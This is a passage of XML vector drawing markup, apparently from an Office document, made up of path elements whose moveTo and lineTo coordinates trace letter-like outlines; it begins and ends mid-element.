                  <a:lnTo>
                    <a:pt x="152425" y="104267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154533" y="103238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156337" y="102425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158178" y="101346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163525" y="97523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="96786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164630" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177241" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177241" y="96786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177241" y="95097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177241" y="65328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177241" y="48895"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="216916" y="29565"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="204266" y="29565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204266" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216916" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216916" y="29565"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="217728" y="3835"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203454" y="3835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203454" y="16954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217728" y="16954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217728" y="3835"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="255333" y="239699"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254749" y="231000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252984" y="223253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250037" y="216471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246062" y="210883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245910" y="210654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242277" y="207340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242277" y="229958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242277" y="249237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240423" y="256159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240360" y="256413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232664" y="266065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227380" y="268478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213829" y="268478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198958" y="229958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200863" y="222719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208432" y="213258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213779" y="210883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227431" y="210883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232727" y="213258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240360" y="222719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242277" y="229958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242277" y="207340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240792" y="205981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234873" y="202641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228155" y="200634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220637" y="199974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213067" y="200634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186474" y="231000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185877" y="239699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186474" y="248424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213067" y="278726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220637" y="279387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228155" y="278726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252869" y="256413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252984" y="256159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254749" y="248424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255333" y="239699"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="255917" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243268" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243268" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255917" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255917" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="324548" y="202907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="320929" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309892" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307238" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299567" y="206286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295122" y="209156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290093" y="213182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290093" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277444" y="202336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277444" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290093" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290093" y="223901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293471" y="221145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296976" y="218909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304253" y="215468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307543" y="214693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316458" y="214693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320001" y="215099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322021" y="215468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323723" y="215874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324396" y="215874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324396" y="214693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324396" y="213182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324396" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324548" y="202907"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="377139" y="202069"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350989" y="202069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350989" y="180441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338340" y="180441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338340" y="202069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329768" y="202069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329768" y="212712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338340" y="212712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338340" y="261823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340321" y="268452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348335" y="276707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354177" y="278777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364058" y="278777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366560" y="278574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372173" y="277774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374764" y="277253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376796" y="276707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377139" y="276707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377139" y="267665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377139" y="265226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376466" y="265226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375462" y="265633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373862" y="266153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369379" y="267347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367207" y="267665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361594" y="267665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359651" y="267347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359194" y="267347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350989" y="212712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377139" y="212712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377139" y="202069"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="406006" y="68986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="364756" y="46786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360654" y="46024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343166" y="34277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343166" y="25463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345338" y="21628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353999" y="15697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359740" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373392" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379755" y="15265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392201" y="19532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397217" y="22212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401027" y="25463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401967" y="25463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401967" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401967" y="9702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397433" y="7708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392226" y="6070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380453" y="3365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374002" y="2679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366941" y="2679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329298" y="22974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329298" y="38696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364058" y="60502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371932" y="61671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375564" y="62395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383387" y="64465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386702" y="66116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391058" y="70332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392137" y="73609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392137" y="83210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389839" y="87337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380631" y="93535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374205" y="95097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360108" y="95097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353860" y="93941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340550" y="89369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334708" y="86118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329628" y="81902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328688" y="81902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328688" y="98590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334657" y="101244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340525" y="103238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352082" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358571" y="106616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372541" y="106616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378282" y="105803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387870" y="102552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392049" y="100330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398564" y="95097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398932" y="94805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401472" y="91579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403275" y="87744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405104" y="83934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406006" y="80073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406006" y="68986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="420992" y="258102"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404901" y="258102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404901" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420992" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420992" y="258102"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="420992" y="202069"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404901" y="202069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404901" y="221259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420992" y="221259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420992" y="202069"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="492239" y="61633"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485114" y="37909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483984" y="36372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479933" y="32004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479933" y="58864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436791" y="58864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437248" y="53911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437337" y="52857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439623" y="47891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447675" y="39916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453059" y="37909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466572" y="37909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471601" y="39738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478193" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479882" y="52133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479933" y="58864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479933" y="32004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478485" y="30441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470674" y="27470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460527" y="27470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426466" y="51066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423938" y="67602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424599" y="76403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454939" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455180" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463689" y="106553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468579" y="106553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473252" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482142" y="103505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486486" y="102019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490778" y="100215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490778" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490778" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490105" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487883" y="88379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484187" y="90385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473811" y="94488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468668" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459689" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456158" y="94957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449719" y="92798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446951" y="91198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444627" y="89027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442188" y="86842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440372" y="84137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437502" y="77139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436803" y="73113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436803" y="68491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492239" y="68491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492239" y="61633"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="561047" y="30403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="557428" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546392" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543737" y="30403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536067" y="33782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531622" y="36639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526592" y="40678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526592" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513943" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513943" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526592" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526592" y="51396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529983" y="48641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533476" y="46405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540766" y="42964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544042" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552970" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556501" y="42595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558520" y="42964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560222" y="43370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560908" y="43370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560908" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560908" y="40678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560908" y="30403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561047" y="30403"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="574865" y="265772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="520890" y="265772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525360" y="262001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540372" y="249059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545338" y="244513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550151" y="239776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553504" y="236499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556374" y="233527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558711" y="230822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561086" y="228142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570598" y="206349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570547" y="193929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567690" y="187325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566813" y="186575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556006" y="177406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547954" y="174917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532688" y="174917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527545" y="175577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516902" y="178193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512635" y="179616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509447" y="181190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509447" y="195326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510133" y="195326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514667" y="192366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519315" y="190157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528751" y="187325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533247" y="186575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543496" y="186575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548271" y="188048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555155" y="193929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556869" y="198005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556869" y="208927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530301" y="243039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506945" y="263220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506945" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574865" y="277291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574865" y="265772"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="639648" y="29565"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="626364" y="29565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603262" y="89433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579970" y="29565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566204" y="29565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596455" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609193" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615416" y="89433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639648" y="29565"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="664387" y="250101"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="638035" y="215468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638416" y="215468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635241" y="215150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619747" y="215150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616343" y="215468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616343" y="188810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663714" y="188810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663714" y="177012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603351" y="177012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603351" y="228676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605993" y="228142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609155" y="227596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615873" y="226606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615213" y="226606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620293" y="226237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628370" y="226237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632117" y="226606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638797" y="227977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641629" y="229196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643978" y="230886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646074" y="232333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647750" y="234251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650113" y="239001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650722" y="241909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650722" y="248932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650201" y="252044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649236" y="254584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648195" y="257429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630669" y="267728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622706" y="267728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617855" y="266915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607974" y="263626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603719" y="261670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599998" y="259321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599046" y="259321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599046" y="273532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602678" y="275170"/>
                  </a:lnTo>
                  <a:lnTo>
